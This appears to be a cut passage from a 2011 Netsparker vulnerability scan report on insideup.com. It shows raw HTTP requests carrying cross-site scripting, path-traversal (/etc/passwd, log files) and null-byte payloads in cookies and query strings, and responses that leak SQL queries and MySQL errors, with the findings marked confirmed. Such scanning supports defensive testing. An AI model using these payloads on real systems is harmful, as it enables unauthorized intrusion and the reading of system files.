User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:28:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=iqnt5pp8ti3qkdvuvm4p7j9ur4; path=/
Content-Length: 2963
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>' OR prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>' OR prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>' OR prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>' OR prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>' OR prj.project_page_url = 'leadflow/dima00/?'"--></style></script><script>netsparker(0x0005F9)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005F9)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/dima00/project.php

/ppc/leadflow/dima00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='%22--%3E%3C/..

Parameters

Parameter Type Value
catId GET 80006
iusrc GET iupsc
nsextt GET '"--></style></script><script>alert(0x0005FC)</script>

Request

GET /ppc/leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005FC)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:31:04 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=9dkclbb1jbff0csgfmd04jm7c5; path=/
Content-Length: 3383
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?catId=80006&iusrc=iupsc&nsextt='"--></style></script><script>netsparker(0x0005FC)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005FC)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/dima00/project.php

/ppc/leadflow/dima00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/dima00/project.php?'"--></style></script><script>alert(0x000601..

Parameters

Parameter Type Value
catId GET 80006
iusrc GET iupsc
Query Based QUERYSTRING '"--></style></script><script>alert(0x000601)</script>

Request

GET /ppc/leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script> HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:31:08 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=b5f6bd9c7gj6ognod8040oq7b6; path=/
Content-Length: 3073
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>' OR prj.project_page_url = 'leadflow/dima00/project.php?'"--></style></script><script>netsparker(0x000601)</script>/' union select 